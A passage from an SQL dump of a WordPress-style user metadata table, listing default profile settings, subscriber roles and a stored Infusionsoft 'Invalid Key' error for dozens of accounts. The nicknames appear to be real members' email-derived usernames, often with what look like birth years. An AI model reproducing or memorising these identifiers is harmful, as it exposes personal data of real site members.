(26677, 2043, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26678, 2043, 'default_password_nag', '1'),
(26679, 2044, 'nickname', 'denekabooth1996'),
(26680, 2044, 'first_name', ''),
(26681, 2044, 'last_name', ''),
(26682, 2044, 'description', ''),
(26683, 2044, 'rich_editing', 'true'),
(26684, 2044, 'comment_shortcuts', 'false'),
(26685, 2044, 'admin_color', 'fresh'),
(26686, 2044, 'use_ssl', '0'),
(26687, 2044, 'show_admin_bar_front', 'true'),
(26688, 2044, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26689, 2044, 'cyb_user_level', '0'),
(26690, 2044, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26691, 2044, 'default_password_nag', '1'),
(26709, 2046, 'rich_editing', 'true'),
(26710, 2046, 'comment_shortcuts', 'false'),
(26711, 2046, 'admin_color', 'fresh'),
(26712, 2046, 'use_ssl', '0'),
(26713, 2046, 'show_admin_bar_front', 'true'),
(26714, 2046, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26715, 2046, 'cyb_user_level', '0'),
(26716, 2046, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26717, 2046, 'default_password_nag', '1'),
(26718, 2047, 'nickname', 'mdboy241999'),
(26719, 2047, 'first_name', ''),
(26720, 2047, 'last_name', ''),
(26721, 2047, 'description', ''),
(26722, 2047, 'rich_editing', 'true'),
(26723, 2047, 'comment_shortcuts', 'false'),
(26724, 2047, 'admin_color', 'fresh'),
(26725, 2047, 'use_ssl', '0'),
(26726, 2047, 'show_admin_bar_front', 'true'),
(26727, 2047, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26728, 2047, 'cyb_user_level', '0'),
(26729, 2047, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26730, 2047, 'default_password_nag', '1'),
(26731, 2048, 'nickname', 'macielizabeth281984'),
(26732, 2048, 'first_name', ''),
(26733, 2048, 'last_name', ''),
(26734, 2048, 'description', ''),
(26735, 2048, 'rich_editing', 'true'),
(26736, 2048, 'comment_shortcuts', 'false'),
(26737, 2048, 'admin_color', 'fresh'),
(26738, 2048, 'use_ssl', '0'),
(26739, 2048, 'show_admin_bar_front', 'true'),
(26740, 2048, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26741, 2048, 'cyb_user_level', '0'),
(26742, 2048, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26743, 2048, 'default_password_nag', '1'),
(26744, 2049, 'nickname', 'jmacsr151963'),
(26745, 2049, 'first_name', ''),
(26746, 2049, 'last_name', ''),
(26747, 2049, 'description', ''),
(26748, 2049, 'rich_editing', 'true'),
(26749, 2049, 'comment_shortcuts', 'false'),
(26750, 2049, 'admin_color', 'fresh'),
(26751, 2049, 'use_ssl', '0'),
(26752, 2049, 'show_admin_bar_front', 'true'),
(26753, 2049, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26754, 2049, 'cyb_user_level', '0'),
(26755, 2049, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26756, 2049, 'default_password_nag', '1'),
(26757, 2050, 'nickname', 'cindy1998'),
(26758, 2050, 'first_name', ''),
(26759, 2050, 'last_name', ''),
(26760, 2050, 'description', ''),
(26761, 2050, 'rich_editing', 'true'),
(26762, 2050, 'comment_shortcuts', 'false'),
(26763, 2050, 'admin_color', 'fresh'),
(26764, 2050, 'use_ssl', '0'),
(26765, 2050, 'show_admin_bar_front', 'true'),
(26766, 2050, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26767, 2050, 'cyb_user_level', '0'),
(26768, 2050, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26769, 2050, 'default_password_nag', '1'),
(26770, 2051, 'nickname', 'brown.tn941967'),
(26771, 2051, 'first_name', ''),
(26772, 2051, 'last_name', ''),
(26773, 2051, 'description', ''),
(26774, 2051, 'rich_editing', 'true'),
(26775, 2051, 'comment_shortcuts', 'false'),
(26776, 2051, 'admin_color', 'fresh'),
(26777, 2051, 'use_ssl', '0'),
(26778, 2051, 'show_admin_bar_front', 'true'),
(26779, 2051, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26780, 2051, 'cyb_user_level', '0'),
(26781, 2051, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26782, 2051, 'default_password_nag', '1'),
(26783, 2052, 'nickname', 'sara.vanderlinden19751981'),
(26784, 2052, 'first_name', ''),
(26785, 2052, 'last_name', ''),
(26786, 2052, 'description', ''),
(26787, 2052, 'rich_editing', 'true'),
(26788, 2052, 'comment_shortcuts', 'false'),
(26789, 2052, 'admin_color', 'fresh'),
(26790, 2052, 'use_ssl', '0'),
(26791, 2052, 'show_admin_bar_front', 'true'),
(26792, 2052, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26793, 2052, 'cyb_user_level', '0'),
(26794, 2052, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26795, 2052, 'default_password_nag', '1'),
(26796, 2053, 'nickname', 'patti1983'),
(26797, 2053, 'first_name', ''),
(26798, 2053, 'last_name', ''),
(26799, 2053, 'description', ''),
(26800, 2053, 'rich_editing', 'true'),
(26801, 2053, 'comment_shortcuts', 'false'),
(26802, 2053, 'admin_color', 'fresh'),
(26803, 2053, 'use_ssl', '0'),
(26804, 2053, 'show_admin_bar_front', 'true'),
(26805, 2053, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26806, 2053, 'cyb_user_level', '0'),
(26807, 2053, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26808, 2053, 'default_password_nag', '1'),
(26809, 2054, 'nickname', 'santiago8020001956'),
(26810, 2054, 'first_name', ''),
(26811, 2054, 'last_name', ''),
(26812, 2054, 'description', ''),
(26813, 2054, 'rich_editing', 'true'),
(26814, 2054, 'comment_shortcuts', 'false'),
(26815, 2054, 'admin_color', 'fresh'),
(26816, 2054, 'use_ssl', '0'),
(26817, 2054, 'show_admin_bar_front', 'true'),
(26818, 2054, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26819, 2054, 'cyb_user_level', '0'),
(26820, 2054, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26821, 2054, 'default_password_nag', '1'),
(26822, 2055, 'nickname', 'alm98812000'),
(26823, 2055, 'first_name', ''),
(26824, 2055, 'last_name', ''),
(26825, 2055, 'description', ''),
(26826, 2055, 'rich_editing', 'true'),
(26827, 2055, 'comment_shortcuts', 'false'),
(26828, 2055, 'admin_color', 'fresh'),
(26829, 2055, 'use_ssl', '0'),
(26830, 2055, 'show_admin_bar_front', 'true'),
(26831, 2055, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26832, 2055, 'cyb_user_level', '0'),
(26833, 2055, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26834, 2055, 'default_password_nag', '1'),
(26835, 2056, 'nickname', 'jamielynnhamilton821976'),
(26836, 2056, 'first_name', ''),
(26837, 2056, 'last_name', ''),
(26838, 2056, 'description', ''),
(26839, 2056, 'rich_editing', 'true'),
(26840, 2056, 'comment_shortcuts', 'false'),
(26841, 2056, 'admin_color', 'fresh'),
(26842, 2056, 'use_ssl', '0'),
(26843, 2056, 'show_admin_bar_front', 'true'),
(26844, 2056, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26845, 2056, 'cyb_user_level', '0'),
(26846, 2056, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26847, 2056, 'default_password_nag', '1'),
(26848, 2057, 'nickname', 'bgmclelland1961'),
(26849, 2057, 'first_name', ''),
(26850, 2057, 'last_name', ''),
(26851, 2057, 'description', ''),
(26852, 2057, 'rich_editing', 'true'),
(26853, 2057, 'comment_shortcuts', 'false'),
(26854, 2057, 'admin_color', 'fresh'),
(26855, 2057, 'use_ssl', '0'),
(26856, 2057, 'show_admin_bar_front', 'true'),
(26857, 2057, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26858, 2057, 'cyb_user_level', '0'),
(26859, 2057, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26860, 2057, 'default_password_nag', '1'),
(26861, 2058, 'nickname', 'mdjordan711958'),
(26862, 2058, 'first_name', ''),
(26863, 2058, 'last_name', ''),
(26864, 2058, 'description', ''),
(26865, 2058, 'rich_editing', 'true'),
(26866, 2058, 'comment_shortcuts', 'false'),
(26867, 2058, 'admin_color', 'fresh'),
(26868, 2058, 'use_ssl', '0'),
(26869, 2058, 'show_admin_bar_front', 'true'),
(26870, 2058, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26871, 2058, 'cyb_user_level', '0'),
(26872, 2058, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26873, 2058, 'default_password_nag', '1'),
(26874, 2059, 'nickname', 'amcniven.cdpb1994'),
(26875, 2059, 'first_name', ''),
(26876, 2059, 'last_name', ''),
(26877, 2059, 'description', ''),
(26878, 2059, 'rich_editing', 'true'),
(26879, 2059, 'comment_shortcuts', 'false'),
(26880, 2059, 'admin_color', 'fresh'),
(26881, 2059, 'use_ssl', '0'),
(26882, 2059, 'show_admin_bar_front', 'true'),
(26883, 2059, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26884, 2059, 'cyb_user_level', '0'),
(26885, 2059, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26886, 2059, 'default_password_nag', '1'),
(26887, 2060, 'nickname', 'eric1993'),
(26888, 2060, 'first_name', ''),
(26889, 2060, 'last_name', ''),
(26890, 2060, 'description', ''),
(26891, 2060, 'rich_editing', 'true'),
(26892, 2060, 'comment_shortcuts', 'false'),
(26893, 2060, 'admin_color', 'fresh'),
(26894, 2060, 'use_ssl', '0'),
(26895, 2060, 'show_admin_bar_front', 'true'),
(26896, 2060, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26897, 2060, 'cyb_user_level', '0'),
(26898, 2060, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26899, 2060, 'default_password_nag', '1'),
(26900, 2061, 'nickname', 'leslielgroff1978'),
(26901, 2061, 'first_name', ''),
(26902, 2061, 'last_name', ''),
(26903, 2061, 'description', ''),
(26904, 2061, 'rich_editing', 'true'),
(26905, 2061, 'comment_shortcuts', 'false'),
(26906, 2061, 'admin_color', 'fresh'),
(26907, 2061, 'use_ssl', '0'),
(26908, 2061, 'show_admin_bar_front', 'true'),
(26909, 2061, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26910, 2061, 'cyb_user_level', '0'),
(26911, 2061, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26912, 2061, 'default_password_nag', '1'),
(26913, 2062, 'nickname', 'dominik.19031992'),
(26914, 2062, 'first_name', ''),
(26915, 2062, 'last_name', ''),
(26916, 2062, 'description', ''),
(26917, 2062, 'rich_editing', 'true'),
(26918, 2062, 'comment_shortcuts', 'false'),
(26919, 2062, 'admin_color', 'fresh'),
(26920, 2062, 'use_ssl', '0'),
(26921, 2062, 'show_admin_bar_front', 'true'),
(26922, 2062, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26923, 2062, 'cyb_user_level', '0'),
(26924, 2062, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26925, 2062, 'default_password_nag', '1'),
(26926, 2063, 'nickname', 'gabriellynch801989'),
(26927, 2063, 'first_name', ''),
(26928, 2063, 'last_name', ''),
(26929, 2063, 'description', ''),
(26930, 2063, 'rich_editing', 'true'),
(26931, 2063, 'comment_shortcuts', 'false'),
(26932, 2063, 'admin_color', 'fresh'),
(26933, 2063, 'use_ssl', '0'),
(26934, 2063, 'show_admin_bar_front', 'true'),
(26935, 2063, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26936, 2063, 'cyb_user_level', '0'),
(26937, 2063, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26938, 2063, 'default_password_nag', '1'),
(26939, 2064, 'nickname', 'susanrlins1954'),
(26940, 2064, 'first_name', ''),
(26941, 2064, 'last_name', ''),
(26942, 2064, 'description', ''),
(26943, 2064, 'rich_editing', 'true'),
(26944, 2064, 'comment_shortcuts', 'false'),
(26945, 2064, 'admin_color', 'fresh'),
(26946, 2064, 'use_ssl', '0'),
(26947, 2064, 'show_admin_bar_front', 'true'),
(26948, 2064, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26949, 2064, 'cyb_user_level', '0'),
(26950, 2064, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26951, 2064, 'default_password_nag', '1'),
(26952, 2065, 'nickname', 'melissa.miers771968'),
(26953, 2065, 'first_name', ''),
(26954, 2065, 'last_name', ''),
(26955, 2065, 'description', ''),
(26956, 2065, 'rich_editing', 'true'),
(26957, 2065, 'comment_shortcuts', 'false'),
(26958, 2065, 'admin_color', 'fresh'),
(26959, 2065, 'use_ssl', '0'),
(26960, 2065, 'show_admin_bar_front', 'true'),
(26961, 2065, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26962, 2065, 'cyb_user_level', '0'),
(26963, 2065, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26964, 2065, 'default_password_nag', '1'),
(26965, 2066, 'nickname', 'krimbo852005'),
(26966, 2066, 'first_name', ''),
(26967, 2066, 'last_name', ''),
(26968, 2066, 'description', ''),
(26969, 2066, 'rich_editing', 'true'),
(26970, 2066, 'comment_shortcuts', 'false'),
(26971, 2066, 'admin_color', 'fresh'),
(26972, 2066, 'use_ssl', '0'),
(26973, 2066, 'show_admin_bar_front', 'true'),
(26974, 2066, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26975, 2066, 'cyb_user_level', '0'),
(26976, 2066, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26977, 2066, 'default_password_nag', '1'),
(26983, 2067, 'comment_shortcuts', 'false'),
(26984, 2067, 'admin_color', 'fresh'),
(26985, 2067, 'use_ssl', '0'),
(26986, 2067, 'show_admin_bar_front', 'true'),
(26987, 2067, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26988, 2067, 'cyb_user_level', '0'),
(26989, 2067, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26990, 2067, 'default_password_nag', '1'),
(26991, 2068, 'nickname', 'blkgbk2010'),
(26992, 2068, 'first_name', ''),
(26993, 2068, 'last_name', ''),
(26994, 2068, 'description', ''),
(26995, 2068, 'rich_editing', 'true'),
(26996, 2068, 'comment_shortcuts', 'false'),
(26997, 2068, 'admin_color', 'fresh'),
(26998, 2068, 'use_ssl', '0'),
(26999, 2068, 'show_admin_bar_front', 'true'),
(27000, 2068, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(27001, 2068, 'cyb_user_level', '0'),
(27002, 2068, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(27003, 2068, 'default_password_nag', '1'),
(27016, 2069, 'default_password_nag', '1'),
(27017, 2070, 'nickname', 'imryanrey2004'),
(27018, 2070, 'first_name', ''),
(27019, 2070, 'last_name', ''),
(27020, 2070, 'description', ''),
(27021, 2070, 'rich_editing', 'true'),
(27022, 2070, 'comment_shortcuts', 'false'),
(27023, 2070, 'admin_color', 'fresh'),
(27024, 2070, 'use_ssl', '0'),
(27025, 2070, 'show_admin_bar_front', 'true'),
(27026, 2070, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(27027, 2070, 'cyb_user_level', '0'),
(27028, 2070, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(27029, 2070, 'default_password_nag', '1'),
(27030, 2071, 'nickname', 'msolh19111966'),
(27031, 2071, 'first_name', ''),
(27032, 2071, 'last_name', ''),
(27033, 2071, 'description', ''),
(27034, 2071, 'rich_editing', 'true'),
(27035, 2071, 'comment_shortcuts', 'false'),
(27036, 2071, 'admin_color', 'fresh'),
(27037, 2071, 'use_ssl', '0'),
(27038, 2071, 'show_admin_bar_front', 'true'),
(27039, 2071, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(27040, 2071, 'cyb_user_level', '0'),
(27041, 2071, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(27042, 2071, 'default_password_nag', '1'),
(27068, 2073, 'default_password_nag', '1'),
(27078, 2074, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(27079, 2074, 'cyb_user_level', '0'),
(27080, 2074, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(27081, 2074, 'default_password_nag', '1'),
(27082, 2075, 'nickname', 'm.slattery1957'),
(27083, 2075, 'first_name', ''),
(27084, 2075, 'last_name', ''),
(27085, 2075, 'description', ''),
(27086, 2075, 'rich_editing', 'true'),
(27087, 2075, 'comment_shortcuts', 'false'),
(27088, 2075, 'admin_color', 'fresh'),
(27089, 2075, 'use_ssl', '0'),
(27090, 2075, 'show_admin_bar_front', 'true'),
(27091, 2075, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(27092, 2075, 'cyb_user_level', '0'),
(27093, 2075, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(27094, 2075, 'default_password_nag', '1'),
(27095, 2076, 'nickname', 'batemansark1975'),
(27096, 2076, 'first_name', ''),
(27097, 2076, 'last_name', ''),
(27098, 2076, 'description', ''),
(27099, 2076, 'rich_editing', 'true'),
(27100, 2076, 'comment_shortcuts', 'false'),
(27101, 2076, 'admin_color', 'fresh'),
(27102, 2076, 'use_ssl', '0'),
(27103, 2076, 'show_admin_bar_front', 'true'),
(27104, 2076, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(27105, 2076, 'cyb_user_level', '0'),
(27106, 2076, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(27107, 2076, 'default_password_nag', '1'),
(27108, 2077, 'nickname', 'pandksawyer20091999'),
(27109, 2077, 'first_name', ''),
(27110, 2077, 'last_name', ''),
(27111, 2077, 'description', ''),
(27112, 2077, 'rich_editing', 'true'),
(27113, 2077, 'comment_shortcuts', 'false'),
(27114, 2077, 'admin_color', 'fresh'),
(27115, 2077, 'use_ssl', '0'),
(27116, 2077, 'show_admin_bar_front', 'true'),
(27117, 2077, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(27118, 2077, 'cyb_user_level', '0'),
(27119, 2077, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(27120, 2077, 'default_password_nag', '1'),
(27121, 2078, 'nickname', 'sklebo1980'),
(27122, 2078, 'first_name', ''),
(27123, 2078, 'last_name', ''),
(27124, 2078, 'description', ''),
(27125, 2078, 'rich_editing', 'true'),
(27126, 2078, 'comment_shortcuts', 'false'),
(27127, 2078, 'admin_color', 'fresh'),
(27128, 2078, 'use_ssl', '0'),
(27129, 2078, 'show_admin_bar_front', 'true'),
(27130, 2078, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(27131, 2078, 'cyb_user_level', '0'),
(27132, 2078, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(27133, 2078, 'default_password_nag', '1'),
(27134, 2079, 'nickname', 'notmelinda1961'),
(27135, 2079, 'first_name', ''),
(27136, 2079, 'last_name', ''),
(27137, 2079, 'description', ''),
(27138, 2079, 'rich_editing', 'true'),
(27139, 2079, 'comment_shortcuts', 'false'),
(27140, 2079, 'admin_color', 'fresh'),
(27141, 2079, 'use_ssl', '0'),
(27142, 2079, 'show_admin_bar_front', 'true'),
(27143, 2079, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(27144, 2079, 'cyb_user_level', '0'),
(27145, 2079, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(27146, 2079, 'default_password_nag', '1'),
(27147, 2080, 'nickname', 'cjdion002009'),
(27148, 2080, 'first_name', ''),
(27149, 2080, 'last_name', ''),
(27150, 2080, 'description', ''),
(27151, 2080, 'rich_editing', 'true'),
(27152, 2080, 'comment_shortcuts', 'false'),
(27153, 2080, 'admin_color', 'fresh'),
(27154, 2080, 'use_ssl', '0'),
(27155, 2080, 'show_admin_bar_front', 'true'),
(27156, 2080, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(27157, 2080, 'cyb_user_level', '0'),
(27158, 2080, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(27159, 2080, 'default_password_nag', '1'),
(27160, 2081, 'nickname', 'd.r.obermark.od1950'),
(27161, 2081, 'first_name', ''),
(27162, 2081, 'last_name', ''),
(27163, 2081, 'description', ''),
(27164, 2081, 'rich_editing', 'true'),
(27165, 2081, 'comment_shortcuts', 'false'),
(27166, 2081, 'admin_color', 'fresh'),
(27167, 2081, 'use_ssl', '0'),
(27168, 2081, 'show_admin_bar_front', 'true'),
(27169, 2081, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(27170, 2081, 'cyb_user_level', '0'),
(27171, 2081, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(27172, 2081, 'default_password_nag', '1'),
(27173, 2082, 'nickname', 'larry1960'),
(27174, 2082, 'first_name', ''),
(27175, 2082, 'last_name', ''),
(27176, 2082, 'description', ''),
(27177, 2082, 'rich_editing', 'true'),
(27178, 2082, 'comment_shortcuts', 'false'),
(27179, 2082, 'admin_color', 'fresh'),
(27180, 2082, 'use_ssl', '0'),
(27181, 2082, 'show_admin_bar_front', 'true'),
(27182, 2082, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(27183, 2082, 'cyb_user_level', '0'),
(27184, 2082, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(27185, 2082, 'default_password_nag', '1'),
(27186, 2083, 'nickname', 'gabrielle.lapine1982'),
(27187, 2083, 'first_name', ''),
(27188, 2083, 'last_name', ''),
(27189, 2083, 'description', ''),
(27190, 2083, 'rich_editing', 'true'),
(27191, 2083, 'comment_shortcuts', 'false'),
(27192, 2083, 'admin_color', 'fresh'),
(27193, 2083, 'use_ssl', '0'),
(27194, 2083, 'show_admin_bar_front', 'true'),
(27195, 2083, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(27196, 2083, 'cyb_user_level', '0'),
(27197, 2083, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}');
INSERT INTO `cyb_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES
(27198, 2083, 'default_password_nag', '1'),
(27199, 2084, 'nickname', 'rodriguez.savannah221954'),
(27200, 2084, 'first_name', ''),
(27201, 2084, 'last_name', ''),
(27202, 2084, 'description', ''),
(27203, 2084, 'rich_editing', 'true'),
(27204, 2084, 'comment_shortcuts', 'false'),
(27205, 2084, 'admin_color', 'fresh'),
(27206, 2084, 'use_ssl', '0'),
(27207, 2084, 'show_admin_bar_front', 'true'),
(27208, 2084, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(27209, 2084, 'cyb_user_level', '0'),
(27210, 2084, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(27211, 2084, 'default_password_nag', '1'),
(27212, 2085, 'nickname', 'byrne34us1985'),
(27213, 2085, 'first_name', ''),
(27214, 2085, 'last_name', ''),
(27215, 2085, 'description', ''),
(27216, 2085, 'rich_editing', 'true'),
(27217, 2085, 'comment_shortcuts', 'false'),
(27218, 2085, 'admin_color', 'fresh'),
(27219, 2085, 'use_ssl', '0'),
(27220, 2085, 'show_admin_bar_front', 'true'),
(27221, 2085, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(27222, 2085, 'cyb_user_level', '0'),
(27223, 2085, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(27224, 2085, 'default_password_nag', '1'),
(27225, 2086, 'nickname', '1dee2cee1979'),
(27226, 2086, 'first_name', ''),
(27227, 2086, 'last_name', ''),
(27228, 2086, 'description', ''),
